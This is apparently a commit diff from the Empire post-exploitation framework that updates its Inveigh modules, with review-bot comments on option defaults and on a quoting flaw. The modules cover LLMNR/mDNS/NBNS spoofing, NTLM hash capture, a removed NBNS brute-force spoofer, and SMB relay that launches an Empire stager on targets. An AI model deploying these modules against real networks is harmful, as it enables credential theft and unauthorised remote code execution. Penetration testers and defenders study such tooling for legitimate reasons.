Inveigh 1.3.1 Modules

Sync with Inveigh 1.3.1.
mdns
Kevin Robertson 2017-04-09 16:37:51 -04:00
parent dd13b13604
commit 534218cf31
6 changed files with 7245 additions and 3750 deletions

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff


@ -9,13 +9,15 @@ class Module:
'Author': ['Kevin Robertson'],
'Description': ('Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool.'),
'Description': ('Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. Note '
'that this module exposes only a subset of Inveigh\'s parameters. Inveigh can be used '
'through Empire\'s scriptimport and scriptcmd if additional parameters are needed.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : True,
'NeedsAdmin' : False,
'OpsecSafe' : True,
@ -37,141 +39,152 @@ class Module:
'Required' : True,
'Value' : ''
},
'IP' : {
'Description' : 'Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the SpooferIP parameter is not set.',
'ConsoleOutput' : {
'Description' : '(Low/Medium/Y) Default = Y: Enable/Disable real time console output. Medium and Low can be used to reduce output.',
'Required' : False,
'Value' : ''
},
'SpooferIP' : {
'Description' : 'Specific IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.',
'Required' : False,
'Value' : ''
},
'SpooferHostsReply' : {
'Description' : 'Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.',
'Required' : False,
'Value' : ''
},
'SpooferHostsIgnore' : {
'Description' : 'Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.',
'Required' : False,
'Value' : ''
},
'SpooferIPsReply' : {
'Description' : 'Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.',
'Required' : False,
'Value' : ''
},
'SpooferIPsIgnore' : {
'Description' : 'Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.',
'Required' : False,
'Value' : ''
},
'SpooferRepeat' : {
'Description' : 'Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'LLMNR' : {
'Description' : 'Enable/Disable LLMNR spoofing (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'LLMNRTTL' : {
'Description' : 'Custom LLMNR TTL in seconds for the response packet.',
'Required' : False,
'Value' : ''
},
'NBNS' : {
'Description' : 'Enable/Disable NBNS spoofing (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'NBNSTTL' : {
'Description' : 'Custom NBNS TTL in seconds for the response packet.',
'Required' : False,
'Value' : ''
},
'NBNSTypes' : {
'Description' : 'Comma separated list of NBNS types to spoof.',
'Required' : False,
'Value' : '00,20'
},
'HTTP' : {
'Description' : 'Enable/Disable HTTP challenge/response capture (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'HTTPAuth' : {
'Description' : 'HTTP server authentication type. This setting does not apply to wpad.dat requests (Anonymous,Basic,NTLM).',
'Required' : False,
'Value' : 'NTLM'
},
'HTTPBasicRealm' : {
'Description' : 'Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.',
'Required' : False,
'Value' : 'IIS'
},
'HTTPResponse' : {
'Description' : 'String or HTML to serve as the default HTTP response. This response will not be used for wpad.dat requests. Do not wrap in quotes and use PowerShell character escapes where necessary.',
'Required' : False,
'Value' : ''
},
'WPADAuth' : {
'Description' : 'HTTP server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts (Anonymous,Basic,NTLM).',
'Required' : False,
'Value' : 'NTLM'
},
'WPADEmptyFile' : {
'Description' : 'Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'WPADIP' : {
'Description' : 'Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.',
'Required' : False,
'Value' : ''
},
'WPADPort' : {
'Description' : 'Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.',
'Required' : False,
'Value' : ''
},
'WPADDirectHosts' : {
'Description' : 'Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. Add the Empire host to avoid catching Empire HTTP traffic.',
'Required' : False,
'Value' : ''
},
'SMB' : {
'Description' : 'Enable/Disable SMB challenge/response capture (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'Challenge' : {
'Description' : 'Specific 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.',
'Required' : False,
'Value' : ''
},
'MachineAccounts' : {
'Description' : 'Enable/Disable showing NTLM challenge/response captures from machine accounts (Y/N).',
'Required' : False,
'Value' : 'N'
},
'ConsoleStatus' : {
'Description' : 'Interval in minutes for auto-displaying all unique captured hashes and credentials. (Y/N)',
'Description' : 'Interval in minutes for displaying all unique captured hashes and credentials. This will display a clean list of captures in Empire.',
'Required' : False,
'Value' : ''
},
'ConsoleUnique' : {
'Description' : 'Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations.',
'Description' : '(Y/N) Default = Y: Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations.',
'Required' : False,
'Value' : 'Y'
'Value' : ''
},
'ElevatedPrivilege' : {
'Description' : '(Auto/Y/N) Default = Auto: Set the privilege mode. Auto will determine if Inveigh is running with elevated privilege. If so, options that require elevated privilege can be used.',
'Required' : False,
'Value' : ''
},
'HTTP' : {
'Description' : '(Y/N) Default = Y: Enable/Disable HTTP challenge/response capture.',
'Required' : False,
'Value' : ''
},
'HTTPAuth' : {
'Description' : '(Anonymous/Basic/NTLM/NTLMNoESS) HTTP listener authentication type. This setting does not apply to wpad.dat requests.',
'Required' : False,
'Value' : ''
},
'HTTPContentType' : {
'Description' : 'Content type for HTTP/Proxy responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" for HTA files or when using HTA code with HTTPResponse.',
'Required' : False,
'Value' : ''
},
'HTTPResponse' : {
'Description' : 'Content to serve as the default HTTP/Proxy response. This response will not be used for wpad.dat requests. Use PowerShell escape characters and newlines where necessary. This paramater will be wrapped in double quotes by this module.',
'Required' : False,
'Value' : ''
},
'Inspect' : {
'Description' : '(Switch) Inspect LLMNR, mDNS, and NBNS traffic only.',
'Required' : False,
'Value' : ''
},
'IP' : {
'Description' : 'Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/mDNS/NBNS spoofing if the SpooferIP parameter is not set.',
'Required' : False,
'Value' : ''
},
'LLMNR' : {
'Description' : '(Y/N) Default = Y: Enable/Disable LLMNR spoofer.',
'Required' : False,
'Value' : ''
},
'mDNS' : {
'Description' : '(Y/N) Enable/Disable mDNS spoofer.',
'Required' : False,
'Value' : ''
},
'mDNSTypes' : {
'Description' : '(QU,QM) Default = QU: Comma separated list of mDNS types to spoof. Note that QM will send the response to 224.0.0.251.',
'Required' : False,
'Value' : ''
},
'NBNS' : {
'Description' : '(Y/N) Enable/Disable NBNS spoofer.',
'Required' : False,
'Value' : ''
},
'NBNSTypes' : {
'Description' : 'Default = 00,20: Comma separated list of NBNS types to spoof.',
'Required' : False,
'Value' : ''
},
'Proxy' : {
'Description' : '(Y/N) Enable/Disable Inveigh\'s proxy server authentication capture.',
'Required' : False,
'Value' : ''
},
'ProxyPort' : {
'Description' : 'Default = 8492: TCP port for the Inveigh\'s proxy listener.',
'Required' : False,
'Value' : ''
},
'RunCount' : {
'Description' : 'Number of NTLMv1/NTLMv2 captures to perform before auto-exiting.',
'Required' : False,
'Value' : ''
},
'RunTime' : {
'Description' : 'Run time duration in minutes.',
'Required' : True,
'Value' : ''
},
'SMB' : {
'Description' : '(Y/N) Default = Y: Enable/Disable SMB challenge/response capture.',
'Required' : False,
'Value' : ''
},
'SpooferIP' : {
'Description' : 'Response IP address for spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.',
'Required' : False,
'Value' : ''
},
'SpooferHostsIgnore' : {
'Description' : 'Comma separated list of requested hostnames to ignore when spoofing.',
'Required' : False,
'Value' : ''
},
'SpooferHostsReply' : {
'Description' : 'Comma separated list of requested hostnames to respond to when spoofing.',
'Required' : False,
'Value' : ''
},
'SpooferIPsIgnore' : {
'Description' : 'Comma separated list of source IP addresses to ignore when spoofing.',
'Required' : False,
'Value' : ''
},
'SpooferIPsReply' : {
'Description' : 'Comma separated list of source IP addresses to respond to when spoofing.',
'Required' : False,
'Value' : ''
},
'SpooferLearning' : {
'Description' : '(Y/N) Enable/Disable LLMNR/NBNS valid host learning.',
'Required' : False,
'Value' : ''
},
'SpooferLearningDelay' : {
'Description' : 'Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning.',
'Required' : False,
'Value' : ''
},
'SpooferRepeat' : {
'Description' : '(Y/N) Default = Y: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.',
'Required' : False,
'Value' : ''
},
'WPADAuth' : {
'Description' : '(Anonymous/Basic/NTLM/NTLMNoESS) HTTP listener authentication type for wpad.dat requests.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
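Review bot: The new option descriptions are inconsistent about defaults: every `Value` is now `''`, and `ConsoleUnique`, `HTTP`, `LLMNR`, `SMB` and `SpooferRepeat` state `Default = Y`, but `mDNS`, `NBNS`, `Proxy` and `SpooferLearning` give only `(Y/N)`, so an operator cannot tell from the module which spoofers and listeners start when the field is left blank. Each of those should carry the default from Invoke-Inveigh's own parameter block, in the form `'(Y/N) Default = <value from Invoke-Inveigh.ps1>: Enable/Disable mDNS spoofer.'`. `NeedsAdmin` is now `False` and `ElevatedPrivilege` defers to Auto, yet no description says which options need elevation; if the script distinguishes them, a short `(Requires elevated privilege)` prefix on those options would document it. The `HTTPResponse` description also misspells `parameter` as `paramater`.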


@ -1,177 +0,0 @@
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-InveighBruteForce',
'Author': ['Kevin Robertson'],
'Description': ('Inveigh\'s remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. '
'This module can be used to perform NBNS spoofing across subnets and/or perform NBNS '
'spoofing without an elevated administrator or SYSTEM shell.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/Kevin-Robertson/Inveigh'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'SpooferIP' : {
'Description' : 'Specific IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Brute Force host.',
'Required' : False,
'Value' : ''
},
'SpooferTarget' : {
'Description' : 'IP address to target for brute force NBNS spoofing.',
'Required' : True,
'Value' : ''
},
'Hostname' : {
'Description' : 'Hostname to spoof with NBNS spoofing.',
'Required' : False,
'Value' : 'WPAD'
},
'NBNS' : {
'Description' : 'Enable/Disable NBNS spoofing (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'NBNSPause' : {
'Description' : 'Number of seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received.',
'Required' : False,
'Value' : ''
},
'NBNSTTL' : {
'Description' : 'Custom NBNS TTL in seconds for the response packet.',
'Required' : False,
'Value' : ''
},
'HTTP' : {
'Description' : 'Enable/Disable HTTP challenge/response capture (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'HTTPAuth' : {
'Description' : 'HTTP server authentication type. This setting does not apply to wpad.dat requests (Anonymous,Basic,NTLM).',
'Required' : False,
'Value' : 'NTLM'
},
'HTTPBasicRealm' : {
'Description' : 'Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.',
'Required' : False,
'Value' : 'IIS'
},
'HTTPResponse' : {
'Description' : 'String or HTML to serve as the default HTTP response. This response will not be used for wpad.dat requests. Do not wrap in quotes and use PowerShell character escapes where necessary.',
'Required' : False,
'Value' : ''
},
'WPADAuth' : {
'Description' : 'HTTP server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts (Anonymous,Basic,NTLM).',
'Required' : False,
'Value' : 'NTLM'
},
'WPADIP' : {
'Description' : 'Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.',
'Required' : False,
'Value' : ''
},
'WPADPort' : {
'Description' : 'Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.',
'Required' : False,
'Value' : ''
},
'WPADDirectHosts' : {
'Description' : 'Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. Add the Empire host to avoid catching Empire HTTP traffic.',
'Required' : False,
'Value' : ''
},
'Challenge' : {
'Description' : 'Specific 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.',
'Required' : False,
'Value' : ''
},
'MachineAccounts' : {
'Description' : 'Enable/Disable showing NTLM challenge/response captures from machine accounts (Y/N).',
'Required' : False,
'Value' : 'N'
},
'RunCount' : {
'Description' : 'Number of captures to perform before auto-exiting.',
'Required' : False,
'Value' : ''
},
'RunTime' : {
'Description' : 'Run time duration in minutes.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Invoke-InveighBruteForce.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# set defaults for Empire
script += "\n" + 'Invoke-InveighBruteForce -Tool "2" '
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
if "," in str(values['Value']):
quoted = '"' + str(values['Value']).replace(',', '","') + '"'
script += " -" + str(option) + " " + quoted
else:
script += " -" + str(option) + " \"" + str(values['Value']) + "\""
return script


@ -9,18 +9,20 @@ class Module:
'Author': ['Kevin Robertson'],
'Description': ('Inveigh\'s SMB relay function. This module can be used to relay '
'incoming HTTP NTLMv2 authentication requests to an SMB target. '
'If the authentication is successfully relayed and the account is '
'a local administrator, a specified command will be executed on the '
'target PSExec style. This module works best while also running '
'collection/inveigh with HTTP disabled.'),
'Description': ('Inveigh\'s SMB relay function. This module can be used to relay incoming '
'HTTP/Proxy NTLMv1/NTLMv2 authentication requests to an SMB target. If the '
'authentication is successfully relayed and the account has the correct '
'privilege, a specified command or Empire launcher will be executed on the '
'target PSExec style. This module works best while also running collection/inveigh '
'with HTTP disabled. Note that this module exposes only a subset of Inveigh '
'Relay\'s parameters. Inveigh Relay can be used through Empire\'s scriptimport '
'and scriptcmd if additional parameters are needed.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : True,
'NeedsAdmin' : False,
'OpsecSafe' : False,
@ -42,31 +44,92 @@ class Module:
'Required' : True,
'Value' : ''
},
'SMBRelayTarget' : {
'Description' : 'IP address of system to target for SMB relay.',
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy_' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Command' : {
'Description' : 'Command to execute on relay target. Do not wrap in quotes and use PowerShell escape characters and newlines where necessary.',
'Required' : False,
'Value' : ''
},
'ConsoleOutput' : {
'Description' : '(Low/Medium/Y) Default = Y: Enable/Disable real time console output. Medium and Low can be used to reduce output.',
'Required' : False,
'Value' : ''
},
'ConsoleStatus' : {
'Description' : 'Interval in minutes for displaying all unique captured hashes and credentials. This will display a clean list of captures in Empire.',
'Required' : False,
'Value' : ''
},
'ConsoleUnique' : {
'Description' : '(Y/N) Default = Y: Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations.',
'Required' : False,
'Value' : ''
},
'HTTP' : {
'Description' : '(Y/N) Default = Y: Enable/Disable HTTP challenge/response capture/relay.',
'Required' : False,
'Value' : ''
},
'Proxy' : {
'Description' : '(Y/N) Default = N: Enable/Disable Inveigh\'s proxy server authentication capture/relay.',
'Required' : False,
'Value' : ''
},
'ProxyPort' : {
'Description' : 'Default = 8492: TCP port for Inveigh\'s proxy listener.',
'Required' : False,
'Value' : ''
},
'RunTime' : {
'Description' : 'Run time duration in minutes.',
'Required' : True,
'Value' : ''
},
'SMBRelayCommand' : {
'Description' : 'Command to execute on SMB relay target. Do not wrap in quotes and use PowerShell character escapes where necessary.',
'Service' : {
'Description' : 'Default = 20 character random: Name of the service to create and delete on the target.',
'Required' : False,
'Value' : ''
},
'SMB1' : {
'Description' : '(Switch) Force SMB1.',
'Required' : False,
'Value' : ''
},
'Target' : {
'Description' : 'IP address or hostname of system to target for relay.',
'Required' : True,
'Value' : ''
},
'SMBRelayUsernames' : {
'Usernames' : {
'Description' : 'Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.',
'Required' : False,
'Value' : ''
},
'SMBRelayAutoDisable' : {
'Description' : 'Automaticaly disable SMB relay after a successful command execution on target (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'RunTime' : {
'Description' : 'Run time duration in minutes.',
'WPADAuth' : {
'Description' : '(Anonymous/NTLM) HTTP listener authentication type for wpad.dat requests.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
@ -82,6 +145,12 @@ class Module:
def generate(self):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy_']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
command = self.options['Command']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-InveighRelay.ps1"
@ -96,11 +165,21 @@ class Module:
script = moduleCode
if command == "":
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
command = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
# set defaults for Empire
script += "\n" + 'Invoke-InveighRelay -Tool "2" '
script += "\n" + 'Invoke-InveighRelay -Tool "2" -Command \"%s\"' % (command)
for option,values in self.options.iteritems():
if option.lower() != "agent":
if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "useragent" and option.lower() != "proxy_" and option.lower() != "proxycreds" and option.lower() != "command":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
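Review bot: In `generate`, the line `script += "\n" + 'Invoke-InveighRelay -Tool "2" -Command \"%s\"' % (command)` places the operator-supplied `Command` value inside a double-quoted PowerShell argument with no escaping or validation, so a value containing a double quote ends the argument early and the remainder is parsed as part of the script. The option description only asks the operator not to wrap the value in quotes; the check belongs in code, for example rejecting such a value with a `helpers.color("[!] ...")` message and `return ""`, as the invalid-listener branch does. The launcher path is probably not affected in the same way if `encode=True` yields an encoded one-liner, which the hunk does not show. The six chained `!=` comparisons would read better as `if option.lower() not in ("agent", "listener", "useragent", "proxy_", "proxycreds", "command"):`. `generate` starts in the previous hunk and continues past this one.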